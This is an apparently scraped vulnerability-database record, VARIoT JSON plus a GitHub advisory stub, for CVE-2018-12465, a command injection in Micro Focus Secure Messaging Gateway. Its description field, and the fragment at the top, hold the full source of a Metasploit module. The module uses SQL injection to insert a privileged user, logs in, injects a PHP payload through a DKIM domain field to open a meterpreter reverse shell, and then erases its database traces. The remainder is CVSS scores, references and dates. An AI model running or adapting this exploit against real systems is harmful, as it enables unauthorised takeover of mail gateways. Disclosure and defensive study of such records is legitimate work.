  'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
  'cookie' => cookie,
  'vars_get' => {
    'cache' => 0,
  },
  'vars_post' => {
    'DkimRecordId' => @dkimid
  }
})

end

def on_new_session(session) print_status('Cleaning up...') cmd = "" cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "' cmd << "DELETE FROM account WHERE loginname ='#{@username}';" cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};" cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};" cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};" cmd << '"' session.shell_command_token(cmd) end

end

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201806-1216",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "secure messaging gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "microfocus",
        "version": "471"
      },
      {
        "model": "micro focus secure messaging gateway",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "microfocus",
        "version": "471"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12465"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "471",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-12465"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Mehmet Ince",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148758"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2018-12465",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2018-12465",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "VHN-122427",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security@opentext.com",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.3,
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.2,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2018-12465",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-12465",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "security@opentext.com",
            "id": "CVE-2018-12465",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201807-017",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-122427",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2018-12465",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122427"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12465"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12465"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12465"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-017"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5). The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n\n  def initialize(info={})\n    super(update_info(info,\n      \u0027Name\u0027           =\u003e \"MicroFocus Secure Messaging Gateway Remote Code Execution\",\n      \u0027Description\u0027    =\u003e %q{\n        This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. \n        An unauthenticated user can execute a terminal command under the context of the web user. \n\n        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,\n        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. \n        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It\u0027s not possible\n        to access this endpoint without having a valid session. \n\n        Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n        of the web user. \n      },\n      \u0027License\u0027        =\u003e MSF_LICENSE,\n      \u0027Author\u0027         =\u003e\n        [\n          \u0027Mehmet Ince \u003cmehmet@mehmetince.net\u003e\u0027 # author \u0026 msf module\n        ],\n      \u0027References\u0027     =\u003e\n        [\n          [\u0027URL\u0027, \u0027https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],\n          [\u0027CVE\u0027, \u00272018-12464\u0027],\n          [\u0027CVE\u0027, \u00272018-12465\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023132\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023133\u0027]\n        ],\n      \u0027DefaultOptions\u0027  =\u003e\n        {\n          \u0027Payload\u0027 =\u003e \u0027php/meterpreter/reverse_tcp\u0027,\n          \u0027Encoder\u0027 =\u003e \u0027php/base64\u0027\n        },\n      \u0027Platform\u0027       =\u003e [\u0027php\u0027],\n      \u0027Arch\u0027           =\u003e ARCH_PHP,\n      \u0027Targets\u0027        =\u003e [[ \u0027Automatic\u0027, { }]],\n      \u0027Privileged\u0027     =\u003e false,\n      \u0027DisclosureDate\u0027 =\u003e \"Jun 19 2018\",\n      \u0027DefaultTarget\u0027  =\u003e 0\n    ))\n\n    register_options(\n      [\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027The URI of the vulnerable instance\u0027, \u0027/\u0027])\n      ]\n    )\n  end\n\n  def execute_query(query)\n    #\n    # We have a very rare SQLi case in here. Normally, it\u0027s would be very easy to exploit it by using time-based techniques\n    # but since we are able to use stacked-query approach, following form of payload is required in order to be able\n    # get back the output of query !\n    #\n    sql = rand_text_alphanumeric(3 + rand(3))\n    sql \u003c\u003c \"\u0027) LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; \"\n    sql \u003c\u003c query\n    sql \u003c\u003c \"; -- \"\n    sql \u003c\u003c rand_text_alphanumeric(3 + rand(3))\n\n    send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027api\u0027, \u00271\u0027, \u0027enginelist.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027appkey\u0027 =\u003e sql\n      }\n    )\n\n  end\n\n  def something_went_wrong\n    fail_with Failure::Unknown, \u0027Something went wrong\u0027\n  end\n\n  def check\n    r = rand_text_numeric(15..35)\n    res = execute_query(\"SELECT #{r}\")\n    unless res\n      vprint_error \u0027Connection failed\u0027\n      return CheckCode::Unknown\n    end\n    unless res.code == 200 \u0026\u0026 res.body.include?(r)\n      return CheckCode::Safe\n    end\n    CheckCode::Vulnerable\n  end\n\n  def implant_payload(cookie)\n    print_status(\u0027Creating a domain record with a malformed DKIM data\u0027)\n    p = [\n      {\n        :id =\u003e \u0027temp_0\u0027,\n        :Description =\u003e rand_text_alpha(5),\n        :DkimList =\u003e [\n          {\n            :Domain =\u003e \"$(php -r \u0027#{payload.encoded}\u0027)\",\n            :Selector =\u003e \u0027\u0027,\n            :TempId =\u003e \u0027tempDkim_1\u0027\n          }\n        ]\n      }\n    ].to_json\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_save_data.json.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027StateData\u0027 =\u003e \u0027[{\"ouid\":1}]\u0027,\n        \u0027SaveData\u0027 =\u003e p\n      }\n    })\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027DbNodeId\u0027)\n      # Defining as global variable since we need to access them later within clean up function. \n      begin\n        @domainid  = res.get_json_document[\u0027Nodes\u0027][0][\u0027DbNodeId\u0027]\n        @dkimid  = res.get_json_document[\u0027Nodes\u0027][1][\u0027DbNodeId\u0027]\n      rescue =\u003e e\n        fail_with Failure::UnexpectedReply, \"Something went horribly wrong while implanting the payload : #{e.message}\"\n      end\n      print_good(\u0027Payload is successfully implanted\u0027)\n    else\n      something_went_wrong\n    end\n  end\n\n  def create_user\n    # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection\n    # issue location where requires a valid session !\n    print_status(\u0027Creating a user with appropriate privileges\u0027)\n\n    # Defining as global variable since we need to access them later within clean up function. \n    @username = rand_text_alpha_lower(5..25)\n    @userid = rand_text_numeric(6..8)\n    query = \"INSERT INTO account VALUES (#{@userid}, 1, \u0027#{@username}\u0027, \u00270\u0027, \u0027\u0027, 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)\"\n\n    execute_query(query)\n    res = execute_query(\"SELECT * FROM account WHERE loginname = \u0027#{@username}\u0027\")\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(@username)\n      print_good(\"User successfully created. Username : #{@username}\")\n    else\n      something_went_wrong\n    end\n  end\n\n  def login\n    print_status(\"Authenticating with created user\")\n    res = send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027security\u0027, \u0027securitygate.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027username\u0027 =\u003e @username,\n        \u0027password\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027passwordmandatory\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027LimitInterfaceId\u0027 =\u003e 1\n      }\n    )\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027/ui/default/index.php\u0027)\n      print_good(\u0027Successfully authenticated\u0027)\n      cookie = res.get_cookies\n    else\n      something_went_wrong\n    end\n    cookie\n  end\n\n  def exploit\n    unless check == CheckCode::Vulnerable\n      fail_with Failure::NotVulnerable, \u0027Target is not vulnerable\u0027\n    end\n\n    create_user\n    cookie = login\n    implant_payload(cookie)\n\n    print_status(\u0027Triggering an implanted payload\u0027)\n    send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_dkim_keygen_request.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027DkimRecordId\u0027 =\u003e @dkimid\n      }\n    })\n\n  end\n\n  def on_new_session(session)\n    print_status(\u0027Cleaning up...\u0027)\n    cmd = \"\"\n    cmd \u003c\u003c \u0027PGPASSWORD=postgres psql -U postgres -d SecureGateway -c \"\u0027\n    cmd \u003c\u003c \"DELETE FROM account WHERE loginname =\u0027#{@username}\u0027;\"\n    cmd \u003c\u003c \"DELETE FROM UserRole WHERE idaccount = #{@userid};\"\n    cmd \u003c\u003c \"DELETE FROM Domain WHERE iddomain = #{@domainid};\"\n    cmd \u003c\u003c \"DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};\"\n    cmd \u003c\u003c \u0027\"\u0027\n    session.shell_command_token(cmd)\n  end\n\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-12465"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "db": "VULHUB",
        "id": "VHN-122427"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12465"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      }
    ],
    "trust": 1.89
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-122427",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=45083",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122427"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12465"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-12465",
        "trust": 2.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "45083",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-017",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-122427",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12465",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148758",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122427"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12465"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12465"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-017"
      }
    ]
  },
  "id": "VAR-201806-1216",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122427"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T13:24:05.093000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Critical Remote Code Execution Vulnerability in SMG (CVE-2018-12465)",
        "trust": 0.8,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
      },
      {
        "title": "Micro Focus Secure Messaging Gateway Web administration Fixes for component operating system command injection vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81643"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-017"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122427"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12465"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://www.exploit-db.com/exploits/45083/"
      },
      {
        "trust": 1.8,
        "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
      },
      {
        "trust": 1.8,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12465"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12465"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/78.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/modules/exploit/linux/http/microfocus_secure_messaging_gateway"
      },
      {
        "trust": 0.1,
        "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12464"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023133\u0027]"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122427"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12465"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12465"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-017"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-122427"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12465"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12465"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-017"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-122427"
      },
      {
        "date": "2018-06-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-12465"
      },
      {
        "date": "2018-09-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "date": "2018-07-31T14:49:49",
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "date": "2018-06-29T16:29:00.337000",
        "db": "NVD",
        "id": "CVE-2018-12465"
      },
      {
        "date": "2018-07-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-017"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-122427"
      },
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-12465"
      },
      {
        "date": "2018-09-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      },
      {
        "date": "2023-11-07T02:52:15.067000",
        "db": "NVD",
        "id": "CVE-2018-12465"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201807-017"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-017"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Micro Focus Secure Messaging Gateway In  OS Command injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006868"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-017"
      }
    ],
    "trust": 0.6
  }
}

GHSA-CH8C-P3PW-FG7F

Vulnerability from github – Published: 2022-05-13 01:34 – Updated: 2022-05-13 01:34

Details

Severity ?

7.2 (High)


                  
                    CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2018-12465"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-06-29T16:29:00Z",
    "severity": "HIGH"
  },
  "details": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5).",
  "id": "GHSA-ch8c-p3pw-fg7f",
  "modified": "2022-05-13T01:34:47Z",
  "published": "2022-05-13T01:34:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12465"
    },
    {
      "type": "WEB",
      "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway"
    },
    {
      "type": "WEB",
      "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45083"
    }
  ],
  "schema_version": "1.4.0",
